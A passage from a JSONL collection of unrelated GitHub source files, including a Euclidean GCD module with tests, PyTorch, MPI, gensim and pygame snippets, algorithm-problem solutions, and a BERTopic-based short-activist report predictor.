the Euclidean division algorihm.\n >>> euclidean_division(10, 3)\n (3, 1)\n\n It fixes the built-in Python integer division implementation to ensure it also works for negative\n numbers. In particular the remainder has to always be a non-negative number less than the divisor.\n This is not observed in the default implementation of integer division in Python for the case of\n negative divisors (though it is implemented correctly for both positive and negative dividends)\n E.g.\n >>> -10 // -3\n 3\n >>> -10 % -3\n -1\n \n ... which are not correct results in my book. In my view q=4 and r=2 is the correct answer.\n This is exactly what my implementation produces:\n >>> euclidean_division(-10, -3)\n (4, 2)\n >>> euclidean_division(100, -20)\n (-5, 0)\n >>> euclidean_division(-100, -20)\n (5, 0)\n >>> euclidean_division(-100, 20)\n (-5, 0)\n >>> euclidean_division(-100, 21)\n (-5, 5)\n '''\n\n # This is exactly the Raymond T. Boute definition of Euclidean\n # division as found in Wikipedia.\n def alternate_impl(a, b):\n def sgn(b):\n assert b!=0\n if (b>0):\n return 1\n else:\n return -1\n q = sgn(b)*floor(a/abs(b))\n r = a - abs(b)*floor(a/abs(b))\n return (q, r)\n\n # below follows my own implementation which I assert (just before returning)\n # that yields results identical to the Raymond T. Boute definition\n if (b==0):\n raise ValueError('b cannot be zero')\n rv = None\n if (b>0): # Python implements this correctly for positive divisors (for both positive and negative dividends), see: https://stackoverflow.com/a/19518866/274677\n rv = (a // b, a % b)\n else: # problems (in my view at least) arise with negative divisors.\n rv = ( a // b if (a % b == 0) else inc(a // b), 0 if (a % b) == 0 else (a % b)-b)\n assert rv[1] >= 0\n assert rv[1] < abs(b), 'when dividing {} by {} a remainder of {} was computed - which is not less than the absolute value of {} ({})'.format(a, b, rv[1], b, abs(b))\n assert b*rv[0]+rv[1]==a\n assert rv==alternate_impl(a, b)\n return rv\n\n\ndef is_int(a):\n return type(a)==type(0)\n\n\n############################################\n# #\n# S I M P L E G C D #\n# I M P L E M E N T A T I O N S #\n# #\n############################################\n\ndef gcd_core_recursive(a, b):\n q, r = euclidean_division(b, a)\n if (r==0):\n return a\n else:\n return gcd_core_recursive(r, a)\n\n\n\ndef gcd_core_nonrecursive(_a, _b):\n a, b = _a, _b\n while True:\n q, r = euclidean_division(b, a)\n if (r==0):\n return a\n else:\n b, a = a, r\n\ndef create_gcd(gcd_core):\n def gcd(a, b):\n if (a==0) and (b==0):\n raise ValueError('a and b cannot both be zero')\n if (a==0):\n return abs(b)\n if (not (is_int(a) and is_int(b))):\n raise ValueError('both a and b must be integers (were: {} and {} respectively)'.format(a, b))\n if (a<0 or b<0):\n return gcd(abs(a), abs(b))\n if (abs(a)>abs(b)):\n return gcd(b, a)\n else:\n return gcd_core(a, b)\n return gcd\n\nclass SimpleGCDTestCases(unittest.TestCase):\n\n def setup(self):\n pass\n\n def test_a(self):\n testCases = [(1, 1, 1), (13, 13, 13), (0, 5, 5), (4, 0, 4),\n (5, 7, 1), (15, 20, 5), (100, 20, 20), (100, 35, 5), (100, 30, 10),\n (20050, 100, 50), (192348002, 123424, 14), (10003032, 92, 4)]\n for gcd_core in [gcd_core_recursive, gcd_core_nonrecursive]:\n gcd = create_gcd(gcd_core)\n for testCase in testCases:\n _a, _b, x = testCase\n for (a, b) in [(_a, _b), (_a, -_b), (-_a, _b), (-_a, -_b), (_b, _a), (_b, -_a), (-_b, _a), (-_b, -_a)]:\n g = gcd(a, b)\n self.assertEquals(g, x, 'gcd({}, {}) was {} and not {} as expected'.format(a, b, g, x))\n\n\n\n\n############################################\n# #\n# E X T E N D E D G C D #\n# I M P L E M E N T A T I O N #\n# #\n############################################\n \ndef calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, a):\n assert abs(B)>=abs(A)\n if (a==B):\n return (0, 1)\n if (a==A):\n return (1, 0)\n if len(remainder_to_dividend_divisor_quotient)==1:\n # edge case\n assert remainder_to_dividend_divisor_quotient.has_key(0)\n b, a2, q = remainder_to_dividend_divisor_quotient.get(0)\n assert a2 == a\n return (1, -(q-1))\n else:\n b, a2, q = remainder_to_dividend_divisor_quotient.get(a)\n r_s_of_b = calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, b)\n r_s_of_a2 = calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, a2)\n return (r_s_of_b[0]-q*r_s_of_a2[0],\n r_s_of_b[1]-q*r_s_of_a2[1])\n \n \n \ndef gcd_extended(a, b):\n if (a==0) and (b==0):\n raise ValueError('a and b cannot both be zero')\n if (not (is_int(a) and is_int(b))):\n raise ValueError('both a and b must be integers (were: {} and {} respectively)'.format(a, b)) \n if (a==0):\n return (abs(b), 0, 1 if b>0 else -1)\n if (b==0):\n return (abs(a), 1 if a>0 else -1, 0)\n def _gcd_extended(a, b):\n assert abs(b)>=abs(a)\n A, B = a, b\n remainder_to_dividend_divisor_quotient = {}\n while True:\n q, r = euclidean_division(b, a)\n remainder_to_dividend_divisor_quotient.update({r: (b, a, q)})\n if (r==0):\n r, s = calculate_r_s(A, B, remainder_to_dividend_divisor_quotient, a)\n return (a, r, s)\n else:\n b, a = a, r\n if (abs(b)>=abs(a)):\n q, r, s = _gcd_extended(a, b)\n else:\n q, s, r = _gcd_extended(b, a)\n if (q < 0):\n return (abs(q), -r, -s)\n else:\n return (q, r, s)\n \n\n\nclass ExtendedGCDTestCases(unittest.TestCase):\n\n def setup(self):\n pass\n\n def test_a(self):\n gcd = gcd_extended\n for (a, b, g_expected) in [(2, 10, 2), (4, 10, 2), (6, 10, 2), (25, 100, 25), (25, 105, 5)\n , (100, 20050, 50), (123424, 192348002, 14), (92, 10003032, 4),\n (2, 1, 1), (1, 8, 1), (17, 1, 1), (1000007, 10003, 1), (0, 3, 3), (-92, 0, 92)\n ]:\n for (_a, _b) in [(a, b), (b, a), (-a, b), (a, -b), (-a, -b), (-b, a), (-b, -a), (-b, -a)]:\n g, r, s = gcd(_a, _b)\n assert g==g_expected, 'gcd({}, {}) calculated g = {} (was expecting: {})'.format(_a, _b, g, g_expected)\n assert g == r*_a+s*_b, 'gcd({}, {}) yielded the triplet ({}, {}, {}), which fails to satisfy {}={}*{}+{}*{}'.format(_a, _b, g, r, s, g, r, _a, s, _b)\n\n\ndef printMostComplexUseCase():\n a = 10003032\n b = 92\n \n (q, r, s) = gcd_extended(a, b)\n assert q == a*r+b*s\n print ('gcd({}, {}) = {}. Also: {} = {}*{} + {}*{}'.format(a, b, q, q, r, a, s, b))\n\nprintMostComplexUseCase()\n \nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n unittest.main()\n\n","repo_name":"mperdikeas/py-abstract-algebra","sub_path":"gcd-euclidean-algorithm/gcd.py","file_name":"gcd.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12165661812","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.model_zoo as modelzoo\n\nclass ConvBNReLU(nn.Module):\n\n def __init__(self, in_chan, out_chan, ks=3, stride=1, padding=1,\n dilation=1, groups=1, bias=False):\n super(ConvBNReLU, self).__init__()\n self.conv = nn.Conv2d(\n in_chan, out_chan, kernel_size=ks, stride=stride,\n padding=padding, dilation=dilation,\n groups=groups, bias=bias)\n self.bn = nn.BatchNorm2d(out_chan)\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n feat = self.conv(x)\n feat = self.bn(feat)\n feat = self.relu(feat)\n return feat\n\n\nclass DetailBranch(nn.Module):\n\n def __init__(self):\n super(DetailBranch, self).__init__()\n self.S1 = nn.Sequential(\n ConvBNReLU(3, 64, 3, stride=2),\n ConvBNReLU(64, 64, 3, stride=1),\n )\n self.S2 = nn.Sequential(\n ConvBNReLU(64, 64, 3, stride=2),\n ConvBNReLU(64, 64, 3, stride=1),\n ConvBNReLU(64, 64, 3, stride=1),\n )\n self.S3 = nn.Sequential(\n ConvBNReLU(64, 128, 3, stride=2),\n ConvBNReLU(128, 128, 3, stride=1),\n ConvBNReLU(128, 128, 3, stride=1),\n )\n\n def forward(self, x):\n feat = self.S1(x)\n feat = self.S2(feat)\n feat = self.S3(feat)\n return feat","repo_name":"zehantan6970/PyraBiNet","sub_path":"segmentation/detail_branch.py","file_name":"detail_branch.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12512642221","text":"#!/usr/bin/env python3\nimport numpy as np\nimport sys\n\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage: {0} model.npz\".format(*sys.argv))\n exit(1)\n\n filename = sys.argv[1]\n with np.load(filename) as model:\n keys = model.files\n print(f\"Inspecting {filename}, with {len(keys)} parameters\")\n for k in keys:\n param = model[k]\n print(f\"Parameter: {k}, shape={param.shape}\", param, sep=\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"marian-nmt/marian-example-library","sub_path":"script/read-npz.py","file_name":"read-npz.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6069933344","text":"\"\"\"\nThis module creates a topic model from a list of bag of word representations of documents.\nUnlike `language_model`, which is built from scratch, this module makes use of the Gensim package\n\"\"\"\n\nfrom gensim import corpora, models\nfrom util.helper_functions import *\n\n\nclass TopicModel:\n\n def __init__(self, bow_list):\n\n # construct corpus compatible with gensim\n # (a list of tuples of (tokenID, frequency) )\n vocabulary = [bow.keys() for bow in bow_list]\n dictionary = corpora.Dictionary(vocabulary)\n corpus = []\n for bow in bow_list:\n doc = []\n for key in bow.keys():\n doc.append((dictionary.token2id[key], bow[key]))\n corpus.append(doc)\n self.corpus = corpus\n self.tfidf = models.TfidfModel(corpus)\n self.corpus_tfidf = self.tfidf[corpus]\n self.dictionary = dictionary\n self.lsi_model = models.lsimodel.LsiModel(corpus=self.corpus_tfidf, id2word=self.dictionary, num_topics=100)\n self.topics = self.lsi_model.show_topics()\n\n def print_top_topics(self, topic_mixture, n=10):\n topic_mixture.sort(key=lambda id_prob: id_prob[1])\n for (topic_id, prob) in topic_mixture[:n]:\n print(\"\\t \" + str(self.topics[topic_id]) + \" \\n \\t with prob \" + str(prob))\n\n def topic_similarity(self, doc1, doc2):\n bow1 = self.dictionary.doc2bow(doc1.split(\" \"))\n topic_mixture1 = self.lsi_model[bow1]\n\n bow2 = self.dictionary.doc2bow(doc2.split(\" \"))\n topic_mixture2 = self.lsi_model[bow2]\n\n if len(topic_mixture1) == 0 or len(topic_mixture2) == 0:\n return None\n\n return cosine_similarity(topic_mixture1, topic_mixture2)\n\n","repo_name":"kharkarag/TextStyleTransfer","sub_path":"topic_model/topic_model.py","file_name":"topic_model.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14503855448","text":"from mpi4py import MPI\nimport numpy as np\n\nimport common\n\n\ndef main():\n comm = MPI.COMM_WORLD\n rank = comm.rank\n size = comm.size\n print_mpi = common.create_print_mpi(comm)\n\n if comm.rank == 0:\n buf = np.array([1, 2], dtype=np.float32)\n else:\n buf = np.array([0, 0], dtype=np.float32)\n\n win = MPI.Win.Create(buf, comm=comm)\n\n print_mpi(buf)\n\n window_owner_rank = 1\n win.Fence()\n if comm.rank == 0:\n win.Lock(window_owner_rank)\n win.Put(buf, window_owner_rank)\n win.Unlock(window_owner_rank)\n win.Fence()\n\n print_mpi(buf)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tyohei/examples","sub_path":"mpi/python/Put.py","file_name":"Put.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"38363759942","text":"import sys\nfrom collections import deque\n\ndef bfs(i,j,visit) :\n queue = deque([[i,j]]) # 큐를 [i,j]로 초기화\n melting_que = deque() # 빙하의 위치(i,j)와 인접한 바다 수를 저장\n visit[i][j] = 1 # 방문\n\n# 인접한 모든 노드들에 대해 탐색 \n while queue :\n x,y = queue.popleft() \n sea = 0 # 바다의 수\n for dx,dy in (-1,0), (1,0), (0,-1), (0,1):\n nx,ny = x+dx, y+dy\n if 0<=nx 빙산의 갯수가 0이거나 2일 경우\nwhile True :\n cnt = 0 # 빙산 개수를 담는 cnt 변수\n visit = [[0]*m for _ in range(n)] # 방문한 노드 체크 \n for i in range(n) :\n for j in range(m) :\n if graph[i][j] !=0 and visit[i][j]==0: # 아직 탐색하지 않은 빙하\n cnt += 1 # 빙산의 갯수 추가\n melt = bfs(i,j,visit) # 빙하가 녹는 위치(i,j)와 인접한 바다 수를 저장하는 큐\n \n while melt :\n m_x, m_y, m = melt.popleft()\n graph[m_x][m_y] = max(graph[m_x][m_y]-m, 0) # 빙하 깎기 \n\n # 빙산의 갯수가 0이거나 2일 경우 반복문 종료\n if cnt == 0 :\n year = 0\n break\n elif cnt >= 2 :\n break\n year += 1 # while 반복 한번에 1년\nprint(year)\n","repo_name":"snovvow/lotuxsoo","sub_path":"2주차_BFS,DFS/[2573] 빙산.py","file_name":"[2573] 빙산.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8917556660","text":"# 공이 구분되지 않으므로 방향이 바뀌면 다른 공이 그 자리를 대체한다.\n# 따라서, 충돌 후에도 같은 방향을 유지한다고 생각하면된다.\n# 임의의 두 공(nC2) 사이의 거리가 2t 이하이면서,\n# 마주보며 운동할 때만(1/4의 확률) 부딪힌다.\n# 공 하나 당 오른쪽, 왼쪽 가능 (전체 4 중에 -> <- 방향 일때만 부딪힌다.) = 1/4\n\nimport sys\ninput = sys.stdin.readline\n\nn = int(input()) # 공의 개수\nposi = list(map(int,input().split())) # 각 공의 위치\nt = int(input()) # 시간\n\nposi.sort()\ncnt = 0\n\nfor i in range(n-1):\n for j in range(i+1, n):\n if (posi[j]-posi[i]) <= 2*t:\n cnt += 1\n\nprint(cnt/4)","repo_name":"bu119/TIL","sub_path":"Algorithm/BAEKJOON/골드/13249_공의충돌.py","file_name":"13249_공의충돌.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3637864067","text":"\"\"\"\nHello world program using python.\n\nThis just opens a blank window with title \"Hello world!\" and waits for 5 seconds before quitting.\n\nPROBLEMS:\n\n* Try changing the size of the window\n* Try changing the title of the window\n* What happens if you don't have the wait?\n\n\"\"\"\n\nimport pygame\n\npygame.init()\n\n# Set the window size\nsize = 400, 400\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption('Hello world!') \n\n# wait for 5 seconds so that we can see the window\npygame.time.wait(5000)\n","repo_name":"anandology/pygame-workshop","sub_path":"game0.py","file_name":"game0.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16567268365","text":"import pytest\nfrom action_app.controllers.base import Base\nfrom action_app.exceptions import OutputNotDirectoryError\n\n@pytest.mark.vcr\ndef test_it_outputs_to_stdout_by_default(run_app):\n app = run_app('command1', 'node1')\n data, output = app.last_rendered\n assert output.find(data['job'].stdout) != -1\n\n@pytest.mark.vcr\ndef test_saving_output_to_a_directory(run_app, tmpdir):\n stdout_path = tmpdir.join('node1.stdout')\n app = run_app('command1', 'node1', '-o', str(tmpdir))\n data, output = app.last_rendered\n job = data['job']\n assert output.find(job.stdout) == -1\n assert stdout_path.check()\n assert stdout_path.read().find(job.stdout) != -1\n\n@pytest.mark.vcr\ndef test_error_handling_if_output_is_a_file(run_app, tmpdir):\n tmpfile = tmpdir.join('file')\n tmpfile.write('')\n with pytest.raises(OutputNotDirectoryError):\n app = run_app('command1', 'node1', '-o', str(tmpfile))\n\n","repo_name":"openflighthpc/action-client-python","sub_path":"tests/test_base_controller.py","file_name":"test_base_controller.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"27118798741","text":"import os\n# Configuration system\nis_notebook = False\ntry:\n if 'google.colab' in str(get_ipython()): # get_ipython can be executed on google colab by default\n is_notebook = True\n from . import predictor_init, Filter, owner\n import getpass\n from google.colab import drive, files # Do not need to install google.colab when the code is executed on google colab\nexcept:\n # others cloud-based notebooks will be integrated soon...\n is_notebook = False\n import predictor_init, Filter, owner\n\nimport sys\nimport numpy as np\nimport pdfplumber\n\nfrom tkinter.filedialog import askopenfilename\nfrom builtins import staticmethod\nimport matplotlib\nmatplotlib.use('Agg')\n\nclass Predictor:\n\n A_ = \"Status First Day Low\"\n B_ = \"Status First Day Close\"\n C_ = \"Status First Week\"\n D_ = \"Status First Week Close\"\n E_ = \"Status First Month Max\"\n F_ = \"Status First Month Closed\"\n global Data_, data7\n\n def __init__(self, token: str):\n\n # system configuration\n os.environ[\"HF_HUB_DISABLE_CACHE\"] = \"1\"\n\n self.predictor_in: predictor_init.Predictor_init = predictor_init.Predictor_init(token_=token) # generate new predictor module\n self.predictor_in.load_all_models()\n self.predictor_in.load_data()\n self.predictor_in.upload_data()\n\n Data_ = self.predictor_in.Data_\n data6_save = self.predictor_in.Data_save\n data6_save['Text'] = data6_save['Text'].map(lambda x: x.split(\" \"))\n data7 = data6_save\n\n def predict_pdf(self):\n text = Filter.tokenizer_text(self.Upload_pdf())\n self.predict(text)\n\n # This function try to match two list.\n # Create a list contain elements of data and data_low that have value as success prediction\n # Value is the prediction success state\n '''def analyze(self, Data_check = Data_, data=data7, status=\"Status First Day Low\", value=1):\n Data__low = Data_check[[\"Activist\", \"Symbol\", status]]\n Data__low[\"Activist\"] = Data__low[\"Activist\"].map(\n lambda x: \" \".join([re.sub(r'[&),_(\\']', \" \", i) for i in x.split(\" \")])) # Process Activist's Name\n Data__low[\"Activist\"] = Data__low[\"Activist\"].map(lambda x: x.lower())\n Data__low = Data__low[Data__low[status] == value]\n\n # data_low are data for prediction value = 1\n # intersection between activist on campaigns file and all short activist reports\n data4_ = data.copy()\n list_ = []\n for a in list(Data__low[\"Activist\"].values):\n if a in list(data4_[\"Research firm\"].values): # select activist that are on the two lists\n list_.append(a)\n\n data4_ = data4_[data4_[\"Research firm\"].isin(list_)]\n Data__low = Data__low[Data__low[\"Activist\"].isin(list_)]\n\n # Check compatibility of Target or Symbol (Some report from campaigns don't have same target to our dataset of report)\n list_1 = []\n for i, a in enumerate(list(Data__low[\"Symbol\"].values)):\n if a in list(data4_[\"Target\"].values):\n list_1.append(a)\n\n data4_ = data4_[data4_[\"Target\"].isin(list_1)]\n Data__low = Data__low[Data__low[\"Symbol\"].isin(list_1)]\n\n final_list = []\n for name, target in zip(list(Data__low[\"Activist\"]), list(Data__low[\"Symbol\"])):\n final_list.append((name, target))\n\n data4_ = data4_[data4_[['Research firm', 'Target']].apply(tuple, axis=1).isin(final_list)]\n\n return [data4_, Data__low]'''\n\n # This function try to match two list.\n # Create a list contain elements of data and data_low that have value as success prediction\n # Value is the prediction success state\n '''def analyze2(self, Data_check=Data_, data=data7, status=\"Status First Day Low\"):\n Data__low = Data_check[[\"Activist\", \"Symbol\", status]] # Select only element of campaingns in status's value\n Data__low[\"Activist\"] = Data__low[\"Activist\"].map(\n lambda x: \" \".join([re.sub(r'[&),_(\\']', \" \", i) for i in x.split(\" \")])) # Process Activist's Name\n Data__low[\"Activist\"] = Data__low[\"Activist\"].map(lambda x: x.lower())\n\n # intersection between activist on compaigns file and all short activist report\n data4_ = data.copy()\n list_ = []\n for a in list(Data__low[\"Activist\"].values):\n if a in list(data4_[\"Research firm\"].values): # select activist that are on the two lists\n list_.append(a)\n\n data4_ = data4_[data4_[\"Research firm\"].isin(list_)]\n Data__low = Data__low[Data__low[\"Activist\"].isin(list_)]\n\n # Check compatibility of Target or Symbol (Some report from compaigns don't have same target to our dataset of report)\n list_1 = []\n for i, a in enumerate(list(Data__low[\"Symbol\"].values)):\n if a in list(data4_[\"Target\"].values):\n list_1.append(a)\n\n data4_ = data4_[data4_[\"Target\"].isin(list_1)]\n Data__low = Data__low[Data__low[\"Symbol\"].isin(list_1)]\n Create by Da glox k an kw anda\n\n final_list = []\n for name, target in zip(list(Data__low[\"Activist\"]), list(Data__low[\"Symbol\"])):\n final_list.append((name, target))\n\n data4_ = data4_[data4_[['Research firm', 'Target']].apply(tuple, axis=1).isin(final_list)]\n\n return [data4_, Data__low]'''\n def is_notebook(self):\n return self.is_notebook\n\n def set_is_notebook(self, value):\n self.is_notebook = value\n\n # this function return topic probability\n # topic_model refer to the BERTtopic model\n def __get_element_prob(self, topic_model, topic_model_B, text__, status='succeed'):\n proba_, proba_B = 0, 0\n if status == \"succeed\":\n topics_, prob_ = topic_model.find_topics(text__, top_n=5)\n proba_ = max(prob_)\n # print(\"A----->\", proba_)\n return proba_\n\n elif status == \"failed\":\n topics_B_, prob_B_ = topic_model_B.find_topics(text__, top_n=5) # top_n refer to number of topic to choose for research'\n proba_B = max(prob_B_)\n # print(\"B----->\", proba_B)\n return proba_B\n\n def predict(self, text):\n print(\"\\n----Start prediction----\")\n\n # first day\n succeed_first_day = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_failed, text)\n failed_first_day = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_failed, text, status='failed')\n self.__result(succeed_first_day, failed_first_day, 'the first day')\n\n # first day closed\n succeed_first_day_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_constant_failed, text)\n failed_first_day_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_first_day_closed, failed_first_day_closed, 'the end of the first day')\n\n # first week\n succeed_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_failed, text)\n failed_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_failed, text, status='failed')\n self.__result(succeed_week, failed_week, 'the week')\n\n # first week closed\n succeed_week_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_constant_failed, text)\n failed_week_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_week_closed, failed_week_closed, 'the end of the week')\n\n # first month\n succeed_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_failed, text)\n failed_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_failed, text, status='failed')\n self.__result(succeed_month, failed_month, 'the month')\n\n # first month closed\n succeed_month_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_constant_failed, text)\n failed_month_closed = self.__get_element_prob(self.predictor_in.topic_model_Data_first_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_month_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_month_closed, failed_month_closed, 'the end of the month')\n\n print(\"----End----\")\n def predict_advanced(self, text):\n # on day of month\n succeed_day_of_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_failed, text)\n failed_day_of_month = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_month_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_day_of_month, failed_day_of_month, 'one day of the month')\n\n # first month\n succeed_day_on_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_failed, text)\n failed_day_on_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_day_to_week_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_day_on_week, failed_day_on_week, 'one day on the week')\n\n # first month closed\n succeed_3_next_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_failed, text)\n failed_3_next_week = self.__get_element_prob(self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_succeed,\n self.predictor_in.topic_model_Data_first_week_to_month_predicted_constant_failed, text,\n status='failed')\n self.__result(succeed_3_next_week, failed_3_next_week, 'the 3 next weeks')\n\n def __result(self, succeed, failed, period='that period'):\n print(f\"Probability of success during {period} ----->\", succeed)\n print(f\"Probability of failure during {period} ----->\", failed)\n print(\"This report indicates a probability of\",\n (\"success\" if succeed >= failed and succeed >= 0.9 else \"failure\"),\n f\"during {period}\\n\")\n\n def __upload_file(self):\n try:\n print(\"\\nUpload a report here (PDF): \")\n file_path = askopenfilename(filetypes=[('PDF Files', '*.pdf')])\n if file_path is not None:\n return file_path\n\n except FileNotFoundError:\n print(\"Cancel uploading report\")\n sys.exit()\n\n ## Method to use on Google Colab. Exclusive!!\n def __upload_file_gc(self):\n try:\n print(\"\\nUpload a report here (PDF): \")\n uploaded = files.upload()\n for fn in uploaded.keys():\n continue\n return fn # return the filename\n\n except (FileNotFoundError,UnboundLocalError) :\n print(\"Cancel uploading report\")\n sys.exit()\n\n def __pdf_to_text(self, file_path):\n with pdfplumber.open(file_path) as pdf:\n title = file_path.split(\"/\")\n title = title[len(title)-1]\n size = pdf.stream.tell()\n print(f'User uploaded file \"{title}\" with length {size} bytes')\n text = ''\n for page in pdf.pages:\n text += page.extract_text()\n return text\n\n # Use the functions\n def Upload_pdf(self):\n global is_notebook\n self.pdf_file_path = \"\"\n if is_notebook:\n self.pdf_file_path = self.__upload_file_gc()\n else:\n self.pdf_file_path = self.__upload_file()\n text = self.__pdf_to_text(self.pdf_file_path)\n return text\n\n ## Here I check if there are failed element in our succeed list\n def __best_performance(self, test_succeed, test_failed):\n succeed, failed = 0, 0\n for elem1, elem2 in zip(test_succeed, test_failed):\n if (elem1 >= elem2):\n succeed += 1\n else:\n failed += 1\n return succeed / len(test_succeed) # 0 to 1\n\n def __get_performance(self, test_succeed, test_failed):\n print(\"performance : \", self.__best_performance(test_succeed, test_failed))\n print(\"mean succeed:\", self.__minimal_stat_(test_succeed))\n print(\"mean failed:\", self.__minimal_stat_(test_failed))\n\n def __minimal_stat_(element):\n arr = np.array(element)\n mean = np.mean(arr)\n std_dev = np.std(arr)\n\n return mean, std_dev\n\n @staticmethod\n def Login_Token():\n global is_notebook\n _token = \"\"\n if is_notebook:\n _token = getpass.getpass(owner.Text_entry_token)\n else :\n _token = input(owner.Text_entry_token)\n return _token","repo_name":"DanGlChris/short_activist_predictor","sub_path":"src/short_activist_predictor/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":15168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21591618009","text":"import openai\nimport os\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\n\ndef colorprint(txt,opt=\"222\",end='\\n'): \n #print(f'\\033[{opt}m',txt,'\\033[0m',end=end)\n print(u\"\\u001b[38;5;\"+opt+'m'+txt+u\"\\u001b[0m\",end=end)\n\ndef initialize(engine='text-ada-001'):\n\n openai.api_type = \"azure\"\n openai.api_base = os.getenv('OPENAI_API_BASE')\n openai.api_version = \"2022-12-01\"\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n print(\"openai.api_type: \"+openai.api_type)\n print(\"openai.api_base: \"+ openai.api_base)\n print(\"openai.api_version: \"+openai.api_version)\n print(\"openai.api_key: \"+'***')\n\ndef project_2D(list_of_arrays_to_project):\n result=[]\n for a in list_of_arrays_to_project:\n tsne = TSNE(n_components=2, perplexity=15, random_state=42, init=\"random\", learning_rate=200)\n matrix = np.vstack(array_to_project)\n vis_dims2 = tsne.fit_transform(matrix)\n\n x = [x for x, y in vis_dims2]\n y = [y for x, y in vis_dims2]\n result.append([x,y])\n return(result)\n\n\ndef string2float(l):\n l = [float(x) for x in l]\n return l","repo_name":"kubasiak/OpenAI_embeddings_clustering","sub_path":"utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4485735852","text":"# import standard libraries\nimport logging\nfrom pathlib import Path\nfrom typing import Any, Dict, Optional\n# import local files\nfrom schemas.configs.data_sources.MySQLSourceSchema import SSHSchema\nfrom schemas.Schema import Schema\nfrom utils.Logger import Logger\n\nclass LegacyConfigSchema(Schema):\n def __init__(self, name:str, all_elements:Dict[str, Any]):\n self._data_dir : Optional[Path]\n self._ssh_config : Optional[SSHSchema]\n\n if not isinstance(all_elements, dict):\n all_elements = {}\n Logger.Log(f\"For {name} base config, all_elements was not a dict, defaulting to empty dict\", logging.WARN)\n if \"DATA_DIR\" in all_elements.keys():\n self._data_dir = LegacyConfigSchema._parseDataDir(all_elements[\"DATA_DIR\"])\n Logger.Log(f\"Found DATA_DIR legacy item in config file.\", logging.INFO)\n else:\n self._data_dir = Path(\"./data/\")\n if 